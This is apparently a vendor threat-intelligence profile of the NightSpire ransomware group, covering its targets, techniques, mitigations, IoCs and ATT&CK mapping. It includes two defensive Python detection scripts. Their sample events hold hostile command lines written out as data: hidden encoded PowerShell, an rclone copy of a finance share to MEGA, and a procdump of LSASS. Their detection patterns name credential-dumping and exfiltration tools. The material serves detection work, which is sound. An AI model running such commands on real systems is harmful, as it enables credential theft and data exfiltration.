Dark Web Profile: NightSpire Ransomware
NightSpire is a financially motivated ransomware group that emerged in early 2025. The group employs a double extortion strategy, encrypting victims’ data and threatening to publish it on their Dark Web Data Leak Site (DLS) if ransoms are not paid. Their operations are marked by wide targeting of organizations across multiple sectors and countries.
NightSpire Ransomware, DLS
Who is NightSpire Ransomware?
NightSpire, a financially driven ransomware group, surfaced in early 2025 and opportunistically targets small to medium-sized enterprises across multiple industries. Initially centered on data theft and extortion, the group has shifted to a double extortion strategy, encrypting data after exfiltration, as seen in recent incidents.
Threat actor card for NightSpire Ransomware
Since March 12, 2025, the group has operated a Dark Web DLS to threaten the release of stolen sensitive data.
NightSpire Ransomware, About Us
What are NightSpire Ransomware’s Targets?
NightSpire’s operations are global in scope. The group does not appear to focus on a specific country or region, instead choosing victims based on exposed vulnerabilities and lack of cyber hygiene. The United States is the most targeted country, followed by Taiwan, Hong Kong, Egypt, and several European nations. Other affected countries include India, Japan, France, Spain, and Poland. The geographical spread suggests a non-geopolitical motive, with a primary focus on financially motivated attacks against soft targets.
The most targeted countries by NightSpire Ransomware
NightSpire’s targets span a wide range of sectors. Analysis of 55 alleged victims reveals that the most frequently attacked industries include Technology, IT Services, Financial Services, Manufacturing, Construction, and Education. Retail, Healthcare, and Public Administration are also represented. The group demonstrates no strong preference for a specific sector, which is consistent with its opportunistic nature.
The most targeted industries by NightSpire Ransomware
This distribution aligns with global ransomware trends, where attackers often exploit under-defended SMBs across critical service sectors.
NightSpire has made major claims about the Taiwanese government and a hospital
The majority of NightSpire’s victims are small to medium-sized enterprises (SMEs), many with fewer than 1,000 employees. These organizations are often less equipped to defend against sophisticated ransomware operations due to limited cybersecurity resources, outdated infrastructure, and inconsistent patching practices. However, the group has also claimed larger targets, including government institutions.
What are NightSpire Ransomware’s Techniques?
NightSpire operates using a blend of traditional ransomware tactics and modern double extortion strategies. The group typically begins by exploiting public-facing vulnerabilities in systems such as VPN appliances, firewalls, or unpatched web servers. A notable example is CVE-2024-55591, an authentication bypass in FortiOS and FortiProxy that was exploited as a zero-day in late 2024 and lets an unauthenticated attacker obtain super-admin privileges through crafted requests to the Node.js websocket module. Successful exploitation of such flaws gives the group highly privileged access to the edge device, from which it pivots into internal systems.
Once inside the network, NightSpire moves laterally using legitimate tools such as PowerShell, PsExec, and Windows Management Instrumentation (WMI). These living-off-the-land techniques, which rely on signed administrative tools and native binaries (LOLBins) rather than custom malware, help avoid early detection. The group escalates privileges, dumps credentials using tools like Mimikatz, and maps out the Active Directory environment to gain control over key systems.
A crucial part of their operation is data exfiltration. Before deploying ransomware, the group packages sensitive files into encrypted archives and transfers them to attacker-controlled infrastructure using utilities such as Rclone or MEGA. The stolen data is used as leverage in ransom negotiations.
Communication with victims takes place over relatively secure platforms such as ProtonMail, Telegram, or custom Dark Web chat portals. NightSpire uses intimidation tactics, urgent deadlines, and staged data releases to pressure victims. They often offer to delete stolen data or provide proof of decryption as negotiation incentives.
Basic flow of a NightSpire Ransomware attack
In summary, NightSpire’s operations follow a streamlined, opportunistic model: gain access, move laterally, steal data, encrypt systems, and extort. Their reliance on known exploits and publicly available tools makes them dangerous yet predictable, especially for organizations that lag behind in patching and monitoring. Their tactics emphasize speed, stealth, and psychological pressure rather than advanced custom malware.
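As an added illustration of how the lateral movement, credential dumping and exfiltration behaviours described above show up in endpoint telemetry (example code written for this page, not NightSpire tooling or a SOCRadar product), the following Python script applies a handful of process-creation detection rules to constructed Sysmon-style events. The hostnames, paths and command lines in SAMPLE_EVENTS are invented for the demonstration; the technique IDs are standard MITRE ATT&CK identifiers. The key design point is to match on the PE's OriginalFileName and on the command line rather than on the on-disk file name, because the group's use of renamed utilities would otherwise slip past a name-based rule.

```python
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str  # MITRE ATT&CK ID
    reason: str


# Constructed Sysmon Event ID 1 (process creation) records, flattened to dicts.
# Hostnames, paths and command lines are invented for this demonstration.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "FS01", "image": r"C:\Windows\PSEXESVC.exe", "original_file_name": "psexesvc.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": r"C:\Windows\PSEXESVC.exe"},
    {"host": "FS01", "image": r"C:\Users\Public\svchost.exe", "original_file_name": "rclone.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"svchost.exe copy D:\Shares\Finance mega:backup --transfers 32 -q"},
    {"host": "DC01", "image": r"C:\Temp\pd.exe", "original_file_name": "procdump",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"pd.exe -accepteula -ma lsass.exe C:\Temp\out.dmp"},
    {"host": "WS02", "image": r"C:\Windows\System32\svchost.exe", "original_file_name": "svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "svchost.exe -k netsvcs"},
]

# -e, -ec, -enc, -encodedcommand ... followed by a payload token.
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|en|enc|enco|encodedcommand)\s+\S", re.I)
# procdump/comsvcs MiniDump against LSASS, or Mimikatz's sekurlsa module.
LSASS_DUMP = re.compile(r"lsass|sekurlsa|mimikatz|comsvcs\.dll.*minidump", re.I)
# rclone or MEGA client invocations, including an rclone "mega:" remote on the command line.
EXFIL_CLI = re.compile(r"\brclone\b|\bmega(cmd|sync)?\b|\bmega:|\bmegatools\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name without .exe, so names from different fields compare equal."""
    return PureWindowsPath(path).name.lower().removesuffix(".exe")


def detect(event: dict) -> list[Finding]:
    host = event["host"]
    image = basename(event["image"])
    parent = basename(event.get("parent_image", ""))
    orig = event.get("original_file_name", "").lower().removesuffix(".exe")
    cmd = event.get("command_line", "")
    out = []

    # Renamed tooling: the OriginalFileName in the PE version resource survives a rename on disk.
    if orig and orig != image:
        out.append(Finding(host, "T1036", f"image {image!r} does not match OriginalFileName {orig!r}"))

    # T1059.001: encoded PowerShell; T1047: anything spawned by the WMI provider host (remote WMI exec).
    if (image.startswith("powershell") or orig.startswith("powershell")) and ENCODED_PS.search(cmd):
        out.append(Finding(host, "T1059.001", "encoded PowerShell command line"))
    if parent == "wmiprvse":
        out.append(Finding(host, "T1047", f"{image} spawned by WmiPrvSE.exe"))

    # T1021.002: PsExec drops and starts the PSEXESVC service on the remote target.
    if "psexesvc" in image or "psexesvc" in orig:
        out.append(Finding(host, "T1021.002", "PSEXESVC service binary executed"))

    # T1003.001: LSASS memory access tooling (exclude lsass.exe's own start-up command line).
    if image != "lsass" and LSASS_DUMP.search(cmd):
        out.append(Finding(host, "T1003.001", "LSASS dump / Mimikatz indicator on command line"))

    # T1567.002: rclone / MEGA exfiltration tooling, regardless of what the binary was renamed to.
    if orig.startswith("rclone") or EXFIL_CLI.search(cmd):
        out.append(Finding(host, "T1567.002", "rclone/MEGA exfiltration tooling"))
    return out


def triage(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in detect(e)]


def technique_counts(findings: list[Finding]) -> dict[str, int]:
    return dict(Counter(f.technique for f in findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.technique:10} {f.reason}")
```

The benign svchost.exe record produces no finding, while the renamed rclone binary is caught twice: once as masquerading and once as exfiltration tooling. In production these rules belong in the EDR or SIEM rather than a script, but the field choices (OriginalFileName, ParentImage, CommandLine) carry over directly to Sigma or KQL.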
What are the Mitigation Tactics Against NightSpire Ransomware?
- Patch Public-Facing Systems Promptly: Apply security updates to firewalls, VPNs, and other exposed services, especially Fortinet devices vulnerable to CVE-2024-55591. Maintain an inventory of internet-facing assets and validate that they are actively monitored and patched.
- Harden Remote Access: Disable unused RDP services. Enforce strong, unique passwords and Multi-Factor Authentication (MFA) for all remote access.
- Limit Lateral Movement: Implement least privilege access. Monitor for unusual use of PowerShell, PsExec, or WMI. Use Endpoint Detection and Response (EDR) tools to flag living-off-the-land techniques.
- Credential Protection: Prevent credential dumping by enforcing LSASS protection (running LSASS as a Protected Process Light and enabling Credential Guard where supported) and deploying security solutions that monitor for Mimikatz and similar tools. Isolate domain controllers and apply local admin restrictions.
- Network Segmentation: Use network segmentation to contain intrusions and prevent attackers from reaching key infrastructure such as Active Directory, file shares, and backup systems.
- Monitor for Exfiltration Tools: Monitor endpoints and network traffic for signs of Rclone, MEGA clients, or other common exfiltration tools. Block unauthorized cloud storage access at the firewall or proxy layer.
- Backup and Recovery: Maintain offline, immutable backups. Test backup restoration regularly. Ensure backups are segmented from the rest of the network and cannot be accessed with the same credentials as production systems.
- Incident Response Plan: Prepare for a ransomware scenario with a tested incident response plan. Include contact protocols, legal review, and public response procedures.
- Encrypt Internal Data and Monitor Access: Encrypt sensitive data at rest. Monitor for large-volume access or movement of files that may indicate exfiltration or staging.
- Threat Intelligence and IoC Monitoring: Monitor for known NightSpire Indicators of Compromise (IoCs) shared by KPMG:
  - File Hashes:
    - 0170601e27117e9639851a969240b959 (MD5)
    - 7a4aee1910b84c6715c465277229740dfc73fa39 (SHA-1)
    - 35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7 (SHA-256)
  - Data Leak Site:
    - a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd[.]onion
Use these IoCs in SIEM and threat detection systems to identify ongoing or past activity.
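For teams without a SIEM feed for these indicators, the following Python script is an added example (written for this page, not KPMG's or SOCRadar's tooling) of sweeping a directory against the published hashes and scanning text lines for the DLS address. Because the three hashes are of different types, the script groups indicators by algorithm and computes MD5, SHA-1 and SHA-256 of every file in a single read pass, so each file is compared against the right digest. The demo() function runs on a temporary directory and constructed log lines; the planted file and its SHA-256 are a positive control added for the demonstration and are not NightSpire indicators.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# IoCs as published above (attributed to KPMG). Algorithm is inferred from digest length.
NIGHTSPIRE_HASHES = {
    "0170601e27117e9639851a969240b959",
    "7a4aee1910b84c6715c465277229740dfc73fa39",
    "35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7",
}
# Defanged brackets removed so the string matches what appears in a ransom note or proxy log.
NIGHTSPIRE_DLS = "a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd.onion"

HASH_ALGOS = {32: "md5", 40: "sha1", 64: "sha256"}
HEX = re.compile(r"^[0-9a-f]+$")
# Tor v3 onion services: 56 base32 characters followed by .onion.
ONION = re.compile(r"\b[a-z2-7]{56}\.onion\b", re.I)


def classify_hash(h: str) -> str:
    """Return md5 / sha1 / sha256 for a hex digest, based on its length."""
    h = h.strip().lower()
    if not HEX.match(h) or len(h) not in HASH_ALGOS:
        raise ValueError(f"not an MD5/SHA-1/SHA-256 hex digest: {h!r}")
    return HASH_ALGOS[len(h)]


def index_iocs(hashes) -> dict[str, set[str]]:
    """Group indicator hashes by algorithm so mixed-type IoC lists are handled correctly."""
    idx = {"md5": set(), "sha1": set(), "sha256": set()}
    for h in hashes:
        idx[classify_hash(h)].add(h.strip().lower())
    return idx


def hash_file(path: Path) -> dict[str, str]:
    """All three digests from one pass over the file (1 MiB chunks)."""
    hs = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in hs.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hs.items()}


def sweep(root: Path, hashes=NIGHTSPIRE_HASHES) -> list[tuple[str, str, str]]:
    """Walk root recursively; return (path, algorithm, digest) for every file matching an IoC."""
    idx = index_iocs(hashes)
    hits = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        for algo, digest in hash_file(p).items():
            if digest in idx[algo]:
                hits.append((str(p), algo, digest))
    return hits


def scan_lines_for_dls(lines, dls=NIGHTSPIRE_DLS) -> list[tuple[int, str, bool]]:
    """Return (line_no, onion, is_known_dls) for any v3 onion address seen in the lines."""
    out = []
    for n, line in enumerate(lines, 1):
        for m in ONION.finditer(line):
            onion = m.group(0).lower()
            out.append((n, onion, onion == dls))
    return out


def demo() -> dict:
    """Self-check on constructed data: a planted file plus a fake ransom-note line (not real evidence)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "benign.txt").write_bytes(b"quarterly report\n")
        planted = root / "planted.bin"
        planted.write_bytes(b"constructed sample standing in for a payload\n")
        # Positive control: the planted file's own SHA-256 is added so the sweep has something to hit.
        iocs = NIGHTSPIRE_HASHES | {hash_file(planted)["sha256"]}
        hits = sweep(root, iocs)
    note_lines = [  # constructed log / note lines
        "2025-04-02T10:14:07Z proxy allow 10.0.0.5 GET https://www.example.com/",
        f"README.txt: Your files are encrypted. Contact us at http://{NIGHTSPIRE_DLS}/",
    ]
    return {"hits": hits, "dls": scan_lines_for_dls(note_lines)}


if __name__ == "__main__":
    result = demo()
    for path, algo, digest in result["hits"]:
        print(f"HIT {algo:6} {digest} {path}")
    for line_no, onion, known in result["dls"]:
        print(f"line {line_no}: {onion} {'(NightSpire DLS)' if known else ''}")
```

The onion scanner flags any v3 address, not only the known DLS, because a ransom note or a Tor2web URL in proxy logs is worth a look even when the address is new; the boolean in each result separates the confirmed NightSpire site from the rest. The DLS address itself will rarely appear in network telemetry, since victims reach it over Tor; file content (ransom notes, staging directories) is the more likely place to find it.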
How Can SOCRadar Help?
NightSpire is a rising ransomware group known for exploiting public-facing vulnerabilities, stealing data, and using double extortion tactics. SOCRadar provides targeted solutions to help organizations detect and stop these threats early.
Extended Threat Intelligence
SOCRadar delivers real-time insights into NightSpire’s tactics, techniques, and procedures (TTPs). This allows organizations to stay ahead of evolving attack patterns, including the use of vulnerabilities like CVE-2024-55591.
Vulnerability Intelligence & Risk Prioritization
NightSpire exploits known vulnerabilities. SOCRadar helps identify and prioritize these risks, enabling security teams to patch the most critical issues before they’re used in an attack.
SOCRadar’s Vulnerability Intelligence
External Attack Surface Management
NightSpire often targets exposed or misconfigured systems. SOCRadar maps internet-facing assets in real time, helping organizations discover and secure shadow IT and reduce their attack surface.
SOCRadar Attack Surface Management
Ransomware Intelligence Dashboard
SOCRadar consolidates global ransomware activity into a single dashboard. Security teams can monitor NightSpire’s campaigns, victim profiles, and infrastructure for better response planning.
In Conclusion
NightSpire represents a typical modern ransomware threat actor: technically capable, financially motivated, and operationally flexible. Their targeting across industries and regions suggests that they are guided not by ideology but by opportunity and profitability. Organizations should view them as a serious threat and implement proactive defenses, including regular vulnerability management, employee awareness training, network segmentation, and well-rehearsed incident response plans. The group’s continued activity underscores the importance of maintaining fundamental cybersecurity practices and preparing for worst-case ransomware scenarios.
What are the MITRE ATT&CK TTPs of NightSpire Ransomware?
| MITRE ID | Technique Name | Description |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Initial access via vulnerable edge systems such as FortiOS (e.g., CVE-2024-55591). |
| T1078 | Valid Accounts | Use of stolen or brute-forced credentials (including RDP). |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Used for lateral movement and remote execution. |
| T1021.002 | Remote Services: SMB/Windows Admin Shares | Lateral movement via administrative shares (e.g., PsExec). |
| T1003.001 | OS Credential Dumping: LSASS Memory | Credential dumping using tools like Mimikatz. |
| T1482 | Domain Trust Discovery | Mapping domain and trust relationships. |
| T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Stolen data sent to attacker-controlled cloud storage (e.g., Rclone to MEGA). |
| T1486 | Data Encrypted for Impact | AES-256 + RSA encryption used to lock systems. |
| T1485 | Data Destruction | Threatens data release and possible destruction during the extortion phase. |
| T1573 | Encrypted Channel | Encrypted channels conceal command-and-control traffic and operator communications. |
| T1583.006 | Acquire Infrastructure: Web Services | Uses cloud platforms for data exfiltration. |